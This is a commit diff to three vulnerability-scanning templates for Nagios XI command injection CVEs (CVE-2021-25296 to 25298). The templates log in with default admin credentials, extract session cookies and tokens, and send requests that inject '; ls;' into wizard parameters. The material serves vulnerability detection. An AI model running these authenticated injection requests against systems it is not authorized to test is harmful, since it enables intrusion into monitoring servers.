Add additional regex's to capture post-login nsp and cookies

cves/2021/CVE-2021-25296.yaml

@@ -21,18 +21,24 @@ requests:
       - |
         GET /nagiosxi/login.php HTTP/1.1
         Host: {{Hostname}}
-
       - |
         POST /nagiosxi/login.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
+        Cookie: nagiosxi={{nagiosxi}}
+
+        nsp={{nsp_token}}&pageopt=login&username=nagiosadmin&password=nagiosadmin
 
-        nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
       - |
-        GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3b%20ls%3b HTTP/1.1
+        GET /nagiosxi/index.php HTTP/1.1
         Host: {{Hostname}}
+        Cookie: nagiosxi={{nagiosxi_authed}}
+
+      - |
+        GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_token_authed}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3b%20ls%3b HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: nagiosxi={{nagiosxi_authed}}
 
-    cookie-reuse: true
     matchers-condition: and
     matchers:   
       - type: regex
@@ -40,6 +46,10 @@ requests:
         regex: 
           - '<input type="hidden" name="plugin_output_len" value="9999; ls;">'
           - "<input type='hidden' name='plugin_output_len' value='9999; ls;'>"
+          
+      - type: status
+        status:
+          - 200
 
     extractors:
       - type: regex
@@ -49,4 +59,29 @@ requests:
         internal: true
         regex:
           - '<input type="hidden" name="nsp" value="(.*)">'
-          - "<input type='hidden' name='nsp' value='(.*)'>"
+          - "<input type='hidden' name='nsp' value='(.*)'>"
+
+      - type: regex
+        part: body
+        name: nsp_token_authed
+        group: 1
+        internal: true
+        regex:
+          - 'var nsp_str = "(.*)";'
+          - "var nsp_str = '(.*)';"
+
+      - type: regex
+        name: nagiosxi
+        part: header
+        group: 1
+        internal: true
+        regex:
+          - 'nagiosxi=(.*); expires'
+
+      - type: regex
+        name: nagiosxi_authed
+        part: header
+        group: 1
+        internal: true
+        regex:
+          - 'only[\s\S]*Set-Cookie: nagiosxi=(.*); expires'

cves/2021/CVE-2021-25297.yaml

@@ -26,11 +26,19 @@ requests:
         POST /nagiosxi/login.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
+        Cookie: nagiosxi={{nagiosxi}}
+
+        nsp={{nsp_token}}&pageopt=login&username=nagiosadmin&password=nagiosadmin
 
-        nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
       - |
-        GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&ip_address=127.0.0.1%3b%20ls%3b&nextstep=4&wizard=digitalocean HTTP/1.1
+        GET /nagiosxi/index.php HTTP/1.1
         Host: {{Hostname}}
+        Cookie: nagiosxi={{nagiosxi_authed}}
+
+      - |
+        GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_token_authed}}&ip_address=127.0.0.1%3b%20ls%3b&nextstep=4&wizard=digitalocean HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: nagiosxi={{nagiosxi_authed}}
 
     cookie-reuse: true
     matchers-condition: and
@@ -49,4 +57,29 @@ requests:
         internal: true
         regex:
           - '<input type="hidden" name="nsp" value="(.*)">'
-          - "<input type='hidden' name='nsp' value='(.*)'>"
+          - "<input type='hidden' name='nsp' value='(.*)'>"
+      
+      - type: regex
+        part: body
+        name: nsp_token_authed
+        group: 1
+        internal: true
+        regex:
+          - 'var nsp_str = "(.*)";'
+          - "var nsp_str = '(.*)';"
+
+      - type: regex
+        name: nagiosxi
+        part: header
+        group: 1
+        internal: true
+        regex:
+          - 'nagiosxi=(.*); expires'
+
+      - type: regex
+        name: nagiosxi_authed
+        part: header
+        group: 1
+        internal: true
+        regex:
+          - 'only[\s\S]*Set-Cookie: nagiosxi=(.*); expires'

cves/2021/CVE-2021-25298.yaml

@@ -26,11 +26,19 @@ requests:
         POST /nagiosxi/login.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
+        Cookie: nagiosxi={{nagiosxi}}
+
+        nsp={{nsp_token}}&pageopt=login&username=nagiosadmin&password=nagiosadmin
 
-        nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
       - |
-        GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20ls%3b HTTP/1.1
+        GET /nagiosxi/index.php HTTP/1.1
         Host: {{Hostname}}
+        Cookie: nagiosxi={{nagiosxi_authed}}
+
+      - |
+        GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_token_authed}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20ls%3b HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: nagiosxi={{nagiosxi_authed}}
 
     cookie-reuse: true
     matchers-condition: and
@@ -49,4 +57,29 @@ requests:
         internal: true
         regex:
           - '<input type="hidden" name="nsp" value="(.*)">'
-          - "<input type='hidden' name='nsp' value='(.*)'>"
+          - "<input type='hidden' name='nsp' value='(.*)'>"
+                
+      - type: regex
+        part: body
+        name: nsp_token_authed
+        group: 1
+        internal: true
+        regex:
+          - 'var nsp_str = "(.*)";'
+          - "var nsp_str = '(.*)';"
+
+      - type: regex
+        name: nagiosxi
+        part: header
+        group: 1
+        internal: true
+        regex:
+          - 'nagiosxi=(.*); expires'
+
+      - type: regex
+        name: nagiosxi_authed
+        part: header
+        group: 1
+        internal: true
+        regex:
+          - 'only[\s\S]*Set-Cookie: nagiosxi=(.*); expires'